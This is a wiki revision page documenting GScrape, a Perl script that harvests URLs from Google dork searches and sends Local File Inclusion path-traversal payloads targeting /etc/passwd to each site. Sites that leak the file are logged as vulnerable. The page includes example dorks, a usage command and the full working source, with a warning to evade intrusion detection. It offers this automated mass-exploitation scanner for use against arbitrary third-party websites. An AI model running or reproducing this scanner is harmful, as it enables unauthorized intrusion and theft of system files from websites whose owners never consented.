Questions about this topic? Sign up to ask in the talk tab.
Difference between revisions of "GScrape"
From NetSec
(→Source) |
|||
Line 31: | Line 31: | ||
# gscrape.pl | # gscrape.pl | ||
# | # | ||
− | # Uses Google::Search to either iterate through a list of dorks | + | # Uses Google::Search to either iterate through a list of dorks |
# And then prints out a list of vulnerable sites. | # And then prints out a list of vulnerable sites. | ||
Revision as of 01:37, 2 January 2012
Contents
Introduction
GScrape is a small perl script that uses Google's Ajax API (Google::Search in | CPAN) to find vulnerable websites.
Example
GScrape is a simple tool, it will look for a file specified by the user containing a list of search terms, query google with those search terms and retrieve an array of websites,
which are then tested for a Local File Inclusion vulnerability, if any are found they are logged to the output file specified by the user.
perl gscrape.pl -f dork.lst -o gscrape.log
GScrape will not return any results unless your input file actually contains a list of search terms. |
Search Terms
These are just some examples of general search terms, they are not guaranteed to find any vulnerabilities.
.php?*= inurl:index.php?page= inurl:include.php?*= index.php?include=
Please note that your search terms in the file DO NOT require "inurl:", GScrape adds it for you if it isn't there.
Source
#!/usr/bin/perl # gscrape.pl # # Uses Google::Search to either iterate through a list of dorks # And then prints out a list of vulnerable sites. use Term::ANSIColor; use Getopt::Std; use HTTP::Request; use Google::Search; use LWP::UserAgent; #vars n shit my $currentversion = "1.0"; my $useragent = LWP::UserAgent->new(); my $infile; my $outfile; my @url_list; my @search_terms; #search terms and my @dorks; #dorks, to check if the terms have "inurl:". ##--main execution: &banner(); &getOpts(); if ($opt{f} && $opt{o} && !$opt{h}) { &printInfo("Trying with the following settings:"); &printInfo( ">>Search Mode: $searchmode"); &printInfo( ">>Output file: $outfile"); &printInfo( ">>Search List: $infile"); &search_list(); } if (!$opt{h} && !$opt{o}){ &printCritical("YOU MUST SPECIFY AN OUTPUT FILE!1!one!"); &printInfo("use -h flag for help"); print"\n\r\nExiting..\n"; } ##--subroutines:. #Search using a list of terms: sub search_list(){ open FILE, "<", $infile or die $!; my @search_terms = <FILE>; my $num = @search_terms; &printInfo("Loaded $num search terms."); &printInfo("Fixing improper search terms [if any]"); #iterate through the search terms, checking if they have "inurl:" if not, prepend it. for( my $int = 0; $int < $num; $int++){ my $random = int(rand($num)); if ( @search_terms[$random] !~ /inurl:/ ){ ##had to learn to use regex sooner or later.. push(@dorks, "inurl:".@search_terms[$random]); } if ( @search_terms[$random] =~ /inurl:/){ push(@dorks, @search_terms[$random]); } } print"\n"; &printInfo("Retrieving search results.."); #iterate through the google dorks (search terms, with 'inurl:'), and add them to the list of sites. foreach(@dorks) { $search = Google::Search->Web( query => $_ ); while ( my $result = $search->next ) { if( $result->uri =~ /\=/) { #check if results have "=" in them (ex: www.site.com/index.php?page=LOLCATS) push(@url_list, $result->uri); #push result into the array &printInfo(">>".$result->uri); } } } my @lfitest = ( '/etc/passwd%00', '/etc/passwd', '../../../../../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../../../../etc/passwd%00'); my $lfinum = @lfitest; print"\n"; &printInfo("Testing sites for vulnerabilities.."); #Test the sites for vulns. foreach( @url_list ){ my $index = @url_list; my $randint = int(rand($index)); my $x = @url_list[$randint]; $x =~ s/=.*/=/ ; for (my $i = 0; $i < $lfinum; $i++){ if ( $x !~ /http:\/\// ){ $x = "http://".$x; } my $request = $useragent->get($x.@lfitest[$i]); my $result = $request->content; if ($result =~ m/root:x:/i){ &printVuln(">>> ".$x.@lfitest[$i]); open FILE, ">>", $outfile or die $!; print FILE "[VULN] >> ".$x.@lfitest[$i]."\n"; close FILE; last; } if ($result =~ m/hacking/i || m/reported/i || m/recorded/i || m/malicious/i){ &printCritical("> Whoops! Tripped an IDS at: ".$x." With: ".@lfitest[$i]); } } } } sub banner() { system('clear'); print("\r+=====================================================================+ \r| GScrape | \r| ________ _________ | \r| / _____/ / _____/ ________________ ______ ____ | \r| / \\ ___ \\_____ \\_/ ___\\_ __ \\__ \\ \\____ \\_/ __ \\ | \r| \\ \\_\\ \\/ \\ \\___| | \\// __ \\| |_> > ___/ | \r| \\______ /_______ /\\___ >__| (____ / __/ \\___ > | \r| \\/ \\/ \\/ \\/|__| \\/ | \r| | \r| | \r| Uses Google AJAX API to search for vulnerabilities | \r+=====================================================================+ \r \r www.BlackhatAcademy.org \r v+$currentversion " ); printWarning("THE END USER IS LIABLE FOR THE USE OF THIS SOFTWARE. \rUSING THIS AGAINST ANY SYSTEM WITHOUT PERMISSION IS A CRIMINAL ACT \rTHE AUTHOR TAKES NO RESPONSIBILITY FOR THE END-USER'S ACTIONS.\n"); } sub getOpts(){ #option modes, and args. my $opt_string = 'f:o:h'; getopts( "$opt_string", \%opt ); #set vars of $outfile, and $infile if they are defined. if ($opt{o}){ $outfile = $opt{o}; } if ($opt{f}){ $infile = $opt{f}; $searchmode = "list"; } #Display help page if -h usage() if $opt{h}; } #YES HELLO, THIS IS HELP PAGE. sub usage(){ print(" GScrape Usage: Search using a list of search terms: -f /path/to/dorks.txt Define output file: -o results.out Example Usages: Run a list of search terms through the scanner: perl gscrape.pl -f ~/Dork.lst -o ~/result.out "); } #HERE BE ANSICOLOR: # [INFO] [CRITICAL] and [WARNING] messages sub printCritical(){ my $error = shift(@_); print color 'bold blue'; print "\r["; print color 'red'; print "CRITICAL"; print color 'bold blue'; print "] "; print color 'red'; print color 'reset'; print $error."\n"; } sub printWarning(){ my $error = shift(@_); print color 'bold blue'; print "\r["; print color 'yellow'; print "WARNING"; print color 'bold blue'; print "] "; print color 'reset'; print $error."\n"; } sub printInfo(){ my $info = shift(@_); print color 'bold blue'; print "\r["; print color 'reset'; print "INFO"; print color 'bold blue'; print "] "; print color 'reset'; print $info."\n"; } sub printVuln(){ my $info = shift(@_); print color 'bold blue'; print "\r["; print color 'green'; print "VULN"; print color 'bold blue'; print "] "; print color 'reset'; print $info."\n"; } |